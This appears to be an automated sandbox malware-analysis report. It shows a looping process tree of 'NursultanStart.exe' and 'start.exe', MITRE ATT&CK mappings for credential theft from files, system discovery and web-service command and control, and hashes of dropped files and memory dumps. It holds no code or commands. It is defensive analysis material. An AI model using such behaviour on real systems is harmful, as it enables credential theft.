        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        444⤵
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        444⤵
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        445⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        445⤵
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        446⤵
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        446⤵
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        447⤵
        
        PID:3632
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        447⤵
        
        PID:1400
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        448⤵
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        448⤵
        
        PID:2024
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        449⤵
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        449⤵
        
        PID:1952
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        450⤵
        
        PID:2896
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        450⤵
        
        PID:3364
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        451⤵
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        451⤵
        
        PID:4468
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        452⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        452⤵
        
        PID:1104
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        453⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        453⤵
        
        PID:4232
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        454⤵
        
        PID:3260
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        454⤵
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        455⤵
        
        PID:2512
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        455⤵
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        456⤵
        
        PID:3712
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        456⤵
        
        PID:1448
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        457⤵
        
        PID:1356
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        457⤵
        
        PID:748
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        458⤵
        
        PID:1008
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        458⤵
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        459⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        459⤵
        
        PID:4668
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        460⤵
        
        PID:4876
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        460⤵
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        461⤵
        
        PID:3800
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        461⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        462⤵
        
        PID:1060
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        462⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        463⤵
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        463⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        464⤵
        
        PID:4232
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        464⤵
        
        PID:4316
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        465⤵
        
        PID:2800
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        465⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        466⤵
        
        PID:2464
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        466⤵
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        467⤵
        
        PID:4408
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        467⤵
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        468⤵
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        468⤵
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        469⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        469⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        470⤵
        
        PID:3364
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        470⤵
        
        PID:2520
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        471⤵
        
        PID:3684
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        471⤵
        
        PID:1552
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        472⤵
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        472⤵
        
        PID:648
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        473⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        473⤵
        
        PID:3260
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        474⤵
        
        PID:2800
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        474⤵
        
        PID:2080
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        475⤵
        
        PID:3664
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        475⤵
        
        PID:1400
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        476⤵
        
        PID:8
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        476⤵
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        477⤵
        
        PID:3680
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        477⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        478⤵
        
        PID:4456
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        478⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        479⤵
        
        PID:2928
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        479⤵
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        480⤵
        
        PID:4016
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        480⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        481⤵
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        481⤵
        
        PID:1176
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        482⤵
        
        PID:1960
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        482⤵
        
        PID:4732
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        483⤵
        
        PID:5004
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        483⤵
        
        PID:3092
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        484⤵
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        484⤵
        
        PID:3624
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        485⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        485⤵
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        486⤵
        
        PID:4192
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        486⤵
        
        PID:4100
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        487⤵
        
        PID:444
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        487⤵
        
        PID:2012

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv dpvmffjUy0y2Zwkz3Ue8hw.0.2
1⤵
PID:2352

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:3488

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:1652

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5076

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:4596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NursultanStart.exe.log

Filesize
1KB

MD5
4c8fa14eeeeda6fe76a08d14e08bf756

SHA1
30003b6798090ec74eb477bbed88e086f8552976

SHA256
7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

SHA512
116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
e2a7fc20b443bab1d5f443e5cced0003

SHA1
fd875f15cf9bdea6d2e507365529fe151e26e399

SHA256
b977c66cd381a362076f0634005a18dbe3644cacb8d17f710076f39fb9e8d72f

SHA512
0442337dde316986c1b637ec1ee54159521a6b5b45cb1d6dcb07e16abd1babdd688d13132300f85e716c80c916f0e3ec04cf538a08a21a1efbf6737d6944ebed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
f4bf3ca8753d6bb9725419fec1ec74b9

SHA1
71fce9d17d1d92873236a9a827c52eb9e4827f3d

SHA256
ca8697e4ada4c3d4aac2899b8aad4052ccd605fccee05ee0a831368bde2f7417

SHA512
a55a107ae8bcf833ea674413c765cd55096146c9634dff41884fcc851c12fe47753308099525c99ae44883facfb668c8b292dd915263f34ebd1190391cb28a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
2b566ffd6de9e256d318da539ea226be

SHA1
5687791670b1391754d5c4d80e520cf7e3edd3db

SHA256
c292acf9fdd61c1cc21b4e3139b32b20b878b7094e7b30fc9d255f0bf60059ef

SHA512
3d76037af1080d099ef0037d1e49a40c883e452bb2e4d8f528d5f824142189ea92faa03488cadee2b30ec9b3a8283935a8b3c26e10578dd1ebbca9eda3a5ea7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
894afb4ff3cd7ee1f69400e936f8fc9d

SHA1
aa0eb6ac58f8997940c1aa2e6f6c42d7c3837e51

SHA256
20948b37924c58362ffc5d1472667b53c6d7fc865ad541c901cebf41d04a03c9

SHA512
449494468d267f9689a277ce858dac7dfda04ceb568f60170645582fd631901a9ef780da8e420cba8a297edc11cd63a874e3429b95cf90e7261d2b9ab8850e98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
c6aae9fb57ebd2ae201e8d174d820246

SHA1
58140d968de47bcf9c78938988a99369bbdb1f51

SHA256
bbc39a8da61fd8ec0d64e708e1ab4986f7fdf580581e464629bf040c595f7c08

SHA512
5959f7dab47bc4bad03635f497ca48f2e0740375528afddfc50964e54983e56df5970b25b8d8b28f1aa73cd6233fac83c634a311e759c58a365570e4862c3e3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
1a58f982c18490e622e00d4eb75ace5a

SHA1
60c30527b74659ecf09089a5a7c02a1df9a71b65

SHA256
4b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d

SHA512
ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
985b3105d8889886d6fd953575c54e08

SHA1
0f9a041240a344d82bac0a180520e7982c15f3cd

SHA256
5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

SHA512
0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
277f918918ca1de032c2948911ecb93c

SHA1
0307e48f22426ecfccad2f8eb0e69937ab957620

SHA256
f1a2de3d06fea09450f785b6746c54aaa5576fd844a42f95bd6776cf6105109f

SHA512
043d2ec78967055dd38d423277964681d9e0720eeb9cbf258c7ec753146d261a613a1e3b7adb9ab277f4657a21230e1c00d8fa96fcdf337c4a63cc1226fd52fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c9b6705519e1eef08f86c4ba5f4286f3

SHA1
6c6b179e452ecee2673a1d4fe128f1c06f70577f

SHA256
0f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705

SHA512
6d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\1JWL63lUsZ0PL0c

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\N0ilK2vVrSnuLLo

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe

Filesize
229KB

MD5
a635e377a579296af70e52f439465078

SHA1
68aff1bf9a48c1d8f326f9ee1d95a795c1b35c35

SHA256
11ca4440ffccc6e94fa1536d27eeafdceea8782202a56f3989b19f845d7864ac

SHA512
cef30f2e3385399c9659acb6938a68a46401b977cb84c1137cc18dd37009c61a91eeb473a65552bb5585af69ecfadd878db0a0f6bd24584153d9796a3e46db39

Download Submit
C:\Users\Admin\AppData\Local\Temp\Z6NNK8o3gtd6fTV

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ptdyeazr.vhm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\khtBY16XpMaOLf0

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\rAvx1VgU82CXBVi\Display\Display.png

Filesize
419KB

MD5
47515f62df5ad4582db2ae62939ed429

SHA1
cc5225f06bbf8c2a33507cbb799e1833830188e1

SHA256
f592e54522934d981bda0463229d816b980d1e6a0763be1d6fdbf002f4fd1acf

SHA512
fcb2b499dcd6258d7df0e91497f28427e84b733f17580b5020922567eaf4678a3bc26e6786c5c3e4d7fec26beb6ab7b90fb7c24bd48fe848952d5320bb8ce1c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\start.exe

Filesize
192KB

MD5
066f7f594bf6f254748bc19562dd1bc3

SHA1
313883f4a7fbfc3c60b153492aeefb927c5d5694

SHA256
9398c6385a5246fe4b86b0f247ddb8a93a9c326389dabef1b96bd65af09b360e

SHA512
04f0c82938dee7a790876ab39282c36eda0c6de11a337d93f728c07be6ff5997605c6a9bba886b94091c313795ee19bf96d65ca9ac1e1d62eeab7acd33b6afca

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/384-62-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp

Filesize
10.8MB

Download
memory/560-136-0x000001CCDF600000-0x000001CCDF610000-memory.dmp

Filesize
64KB

Download
memory/560-138-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp

Filesize
10.8MB

Download
memory/560-103-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp

Filesize
10.8MB

Download
memory/560-113-0x000001CCDF600000-0x000001CCDF610000-memory.dmp

Filesize
64KB

Download
memory/560-117-0x000001CCDF600000-0x000001CCDF610000-memory.dmp

Filesize
64KB

Download
memory/872-74-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp

Filesize
10.8MB

Download
memory/872-90-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp

Filesize
10.8MB

Download
memory/872-78-0x0000027E41A40000-0x0000027E41A50000-memory.dmp

Filesize
64KB

Download
memory/872-76-0x0000027E41A40000-0x0000027E41A50000-memory.dmp

Filesize
64KB

Download
memory/876-97-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp

Filesize
10.8MB

Download
memory/920-41-0x000001FCF2A60000-0x000001FCF2A70000-memory.dmp

Filesize
64KB

Download
memory/920-42-0x000001FCF2A60000-0x000001FCF2A70000-memory.dmp

Filesize
64KB

Download
memory/920-35-0x000001FCF29F0000-0x000001FCF2A12000-memory.dmp

Filesize
136KB

Download
memory/920-40-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp

Filesize
10.8MB

Download
memory/920-58-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp

Filesize
10.8MB

Download
memory/1600-4518-0x0000024D57420000-0x0000024D5758A000-memory.dmp

Filesize
1.4MB

Download
memory/1612-166-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp

Filesize
10.8MB

Download
memory/1844-135-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp

Filesize
10.8MB

Download
memory/1844-186-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp

Filesize
10.8MB

Download
memory/1908-52-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp

Filesize
10.8MB

Download
memory/1964-176-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp

Filesize
10.8MB

Download
memory/1976-3509-0x00000223F35D0000-0x00000223F373A000-memory.dmp

Filesize
1.4MB

Download
memory/2032-45-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp

Filesize
10.8MB

Download
memory/2032-98-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp

Filesize
10.8MB

Download
